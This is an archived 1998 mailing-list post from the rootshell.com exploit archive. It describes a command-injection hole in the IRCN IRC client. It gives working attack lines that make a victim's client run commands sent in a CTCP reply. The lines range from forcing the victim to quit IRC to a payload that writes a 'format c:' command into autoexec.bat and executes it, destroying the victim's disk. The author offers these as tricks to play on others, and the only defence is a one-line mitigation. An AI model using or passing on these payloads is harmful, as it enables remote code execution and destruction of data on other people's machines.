[ from http://www.rootshell.com/ ] From tom@sensel.com Thu Jul 23 09:12:15 1998 Date: Wed, 22 Jul 1998 23:02:37 -0400 From: Tom To: www-request@rootshell.com Subject: Ircn Exploit.. While looking around at IRCN (irc client).. I noticed a hole in the code which allowed people to run programs, make the ircn user quit off irc, etc.. There isn't really much to say about it.. Here is how you do it.. How to exploit bug: In a windows irc client type: /ctcpreply (nickname) ping $quit(i,am,owned) Result: *** ^DaWg^ (DaWg@cc576078-a.essx1.md.home.com) Quit (owned by nofear) For you unix users telnet to the irc server on port 6667 and type user bleh bleh bleh bleh bleh nick asdfksdjflk (this will be your nick.. Get creative) then type: notice (nick) (press ctrl + a) ping $quit(i,am,owned)(press ctrl + a) and bam!@# How to fix bug: in your ircn client type /events off There are a lot of nice little things you can do with this bug... here are a few.. /ctcpreturn (nick) $run(echo,"echo,y,|,format,c:\",>,c:\autoexec.bat) /ctcpreturn (nick) $run(c:\autoexec.bat) -NoFear